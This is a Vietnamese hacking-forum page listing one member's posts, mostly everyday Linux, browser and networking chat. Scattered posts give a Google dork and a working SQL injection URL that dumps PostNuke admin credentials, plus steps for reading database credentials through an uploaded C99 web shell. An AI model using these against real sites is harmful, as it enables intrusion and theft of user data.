banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: vnkimlong  XML
Profile for vnkimlong Messages posted by vnkimlong [ number of posts not being displayed on this page: 1 ]
 
Mình đang dùng mạng 3G của Viettel. Theo cách suy nghĩ của mình thì DNS server của các ISP không phân giải IP cho tên miền www.facebook.com.
Code:
IP của facebook là: 69.171.229.11

Trước khi thay đổi sang DNS của Google thì mình thực hiện lệnh (1):
Code:
ping facebook.com

--> kết quả là không ping được.
và lệnh (2)Code:
ping 69.171.229.11

---> kết quả là ping được.
đến đây mình vội mừng, và gõ 69.171.229.11 lên trình duyệt nhưng lại không thể vào được facebook.
Sau khi chuyển sang Google DNS (lúc này đều thực hiện thành công lệnh (1) và (2)), thì lại có thể vào được facebook thông qua địa chỉ 69.171.229.11.

Khi ta gõ địa chỉ www.facebook.com thì máy mình truy xuất tới DNS server để lấy IP của www.facebook.com rồi mới truy cập thông qua IP đó, nếu ta đã biết được IP thì có thể vào trực tiếp bằng IP luôn. Mình thắc mắc ở đây là lúc đầu ta ping thành công 69.171.229.11 (có reply) mà tại sao vẫn không thể vào được ?

nhưng nó không phù hợp với tôi, tôi là hậu duệ của Clark Kent (nhân vật chính trong Smallville), nên có thể đọc với tốc độ rất nhanh.
Mình đang dùng Microsoft Security Essentials, nó miễn phí (dành cho windows) và rất tốt. Không cần phải tốn thêm tiền để mua BKAV hay KAS nữa.
Bạn nên dùng swap. Có thể giảm kích thước các phân vùng khác để tăng cho swap bằng phần mềm GParted. Để thay đổi phân vùng cài fedora phải dùng LiveCD.
Tham khảo : http://opensource.com.vn/opensource/linux/ubuntu/70-thay-doi-kich-thuoc-swap-tren-ubuntu.html
(Ubuntu cũng giống Fedora)
@quanta

Để chỉnh cỡ chữ lớn/nhỏ thì dùng tổ hợp phím "Ctrl +" hoặc "Ctrl -"
Mình đã gắn bó với ubuntu được 2 năm rồi, mặc dù nó không ổn định nhưng mình vẫn dùng smilie
Mình cũng đang thắc mắc luôn, mấy cái đó có thể phát hiện ra khi mình invisible, không hiểu tại sau ?
Mình có đọc bài này : /hvaonline/posts/list/17223.html
và : /hvaonline/posts/list/2303.html

Những bài biết trên chỉ hướng dẫn cách mã hóa với public key và giải mã với private key.
Mình muốn làm ngược lại thì sao ?
PS: Mình cũng đã từng thử Chrome browser trên Linux nhưng không được "nuột" lắm. Firefox vẫn là vô địch. 


Mình dùng FireFox trên Ubuntu, gặp flash nó giật kinh lắm smilie

camus wrote:
Ở nhà sách NTMK hết rồi smilie 

Hôm nay lúc mình đến, thấy còn 1 cuốn duy nhất trên kệ, thế là chộp luôn smilie
Mình vừa mới mở một website, mình dùng shell để kiểm tra server xem có an toàn không, website của mình có thể bị hack không qua đường local ?
Đây là thông tin của server :

safe_mode: ON. PHP version: 5.2.8 curl: ON MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF

Disable functions : system, exec, shell_exec, passthru, pcntl_exec, putenv, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, popen, pclose, set_time_limit, escapeshellcmd, escapeshellarg, dl, parse_ini_file, show_source,ini_alter, virtual, openlog, ini_restore

Linux ns17.pavietnam.vn 2.6.18-92.el5 #1 SMP Tue Jun 10 18:51:06 EDT 2008 x86_64
Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2

uid=99 ( nobody ) gid=99 ( nobody ) 


Hiện giờ có nhiều người đặt password của các tài khoản giống nhau(mình cũng vậy), nếu biết pass của các thành viên trong forum có thể mò ra những tài khoản khác chăng smilie
Mình thấy cái CodeBlocks cũng ngon, mà hình như nó bị xung đột với scim-unikey trên ubuntu, nhiều lúc chỉ gõ được số mà không gõ được chữ
Mình dùng Ubuntu, vì Ubuntu có cả một cộng đồng lớn mạnh, muốn có sự giúp đỡ là nhận dc ngay.
mình cũng có thử vài exploit của milw0rm nhưng ko hiểu quả, 1 số báo thiều quyền thực thi 

Vậy bạn thử chmod nó xem.
và 1 sô run được nhưng ko thể exploit  

Đó là vì kernel của bạn không có lỗi.


Mình thấy FF mặc định đã tốt, không cần phải cái thêm addon nào nữa, mà sao thấy mọi người ai cũng dùng DownThemAll nhỉ, FF đã có chức năng download rồi mà.

Bạn thử tham khảo cái này : http://wiki.ubuntu-vn.org/index.php/M%E1%BA%A1ng%2C_m%E1%BA%A1ng_kh%C3%B4ng_d%C3%A2y%2C_v%C3%A0_c%C3%A1c_thi%E1%BA%BFt_b%E1%BB%8B_m%E1%BA%A1ng
Mình không có điều kiện nên chọn một trường công lập cho học phí rẻ.
Cái này là có thật hay bác conmale tự sáng tác vậy smilie
Mà có được nick yahoo của bác conmale thật khó, em seach trên google hoài mà không ra, không hiểu sao "cuti" lại có được smilie
Hacker đó cho rằng thâm nhập vào host của em chỉ mất 15 phút và đã giấu trong host 1 file chỉ có người đó có pass mở 

Cái này chắc là local attack rồi, cái file có pass kia chắc là shell rồi smilie . Cái này là do server dỏm nên mới bị.
Theo kinh nghiệm của mình thì kiếm 1 cái LiveCD của một distro linux nào đấy để chạy, rồi đút USB vào và xóa những file kia bình thường smilie
Cái này tùy server, nhưng hiện nay server chạy được file dạng *.php.jpg không còn nhiều (có thể gọi là rất hiếm).
Muốn trở thành hacker thì phải biết hết, phải thông thạo hết. Lựa chọn cái nào cũng được, nhưng để trở thành hacker thì phải học luôn cả mấy cái kia.

hmtaccess wrote:
Code:
- Linux hoàn toàn không có Virus

Không biết tin này chính xác hay không nữa
Bạn có thể chứng minh được không ?
smilie  


Đúng là trên Linux không có virus, hoặc nếu có thì virus cũng không gây ảnh hưởng gì tới hệ thống. Trên Windows, bạn có thể dễ dàng thực hiện một lệnh nào đó liên quan đến hệ thống vì tài khoản bạn sử dụng trong hệ thống chính là tài khoản Administrator, do vậy virus có thể chạy các lệnh gây ảnh hưởng xấu đến hệ thống của bạn. Còn trên Linux, bình thường bạn sẽ không có quyền root để chạy các lệnh liên quan đến hệ thống (root = Administrator), vì vậy virus không gậy hại nhiều cho hệ thống Linux của bạn.
Cái này hình như viết bằng Pascal thì phải ?
HVA có thể mở một kênh chat IRC, cái này rất thuận tiện để thảo luận nhóm trực tuyến.
Tóm lại là lên google tìm với từ khóa :
inurl:modules.php?op=modload&name=News 

Rồi thêm vào website tìm được dòng :
modules.php?op=modload&name=News&file=article&sid=-1%20UNION%20all%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21%20FROM%20nuke_users/* 

Và nó sẽ hiện lên user và password của admin (pass được mã hóa và rất khó crack)
Đã up được shell thì bạn hãy tìm các thông tin về database, thường thì nó ở trong file config.php hay configuration.php (tùy từng website, có thể khác). Khi đã thu thập được những thông tin này rồi, bạn có thể connect vào database (đối với C99 thì bạn nhấp vào SQL, còn các loại khác mình cũng ko nhớ nữa)
Mình seach trên google một lúc thì ra được trang này : http://dbeta.tienve.org .
Vào thì thấy giống HVA tới 100%, từ trước tới giờ chưa bao giờ nghe nói HVA có địa chỉ này, liệu đây có phải là một trang giả mạo HVA. Nếu là phải thì mong ban quản trị thông báo đến các thành viên nên chú ý để tránh bị lừa .




 
Go to Page:  Page 2 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|